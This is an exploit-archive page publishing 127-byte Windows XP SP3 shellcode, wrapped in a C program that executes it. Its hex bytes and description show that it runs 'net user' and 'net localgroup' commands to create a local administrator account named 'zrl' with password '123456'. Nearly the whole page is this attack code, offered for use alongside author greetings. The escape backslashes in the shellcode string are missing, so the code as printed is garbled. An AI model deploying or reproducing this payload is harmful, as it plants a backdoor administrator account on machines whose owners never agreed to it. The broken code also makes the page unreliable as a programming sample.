[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes
# Published : 2010-09-20
# Author :
# Previous Title : Linux x86 ASLR deactivation - 83 bytes
# Next Title : ARM Loader Port 0x1337
# Title : win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes
# Proof : http://img823.imageshack.us/img823/1017/addqx.jpg
# Desc. : usr: zrl , pass: 123456 , localgroup: Administrator
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 17/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : off ulan off / http://www.youtube.com/watch?v=GbyF62skA-c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"xebx1bx5bx31xc0x50x31xc0x88x43x5dx53xbbxadx23x86x7c"
"xffxd3x31xc0x50xbbxfaxcax81x7cxffxd3xe8xe0xffxffxff"
"x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x20x75x73"
"x65x72x20x7ax72x6cx20x31x32x33x34x35x36x20x2fx61x64"
"x64x20x26x26x20x6ex65x74x20x6cx6fx63x61x6cx67x72x6f"
"x75x70x20x41x64x6dx69x6ex69x73x74x72x61x74x6fx72x73"
"x20x2fx61x64x64x20x7ax72x6cx20x26x26x20x6ex65x74x20"
"x75x73x65x72x20x7ax72x6c";
printf("Size = %d bytesn", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}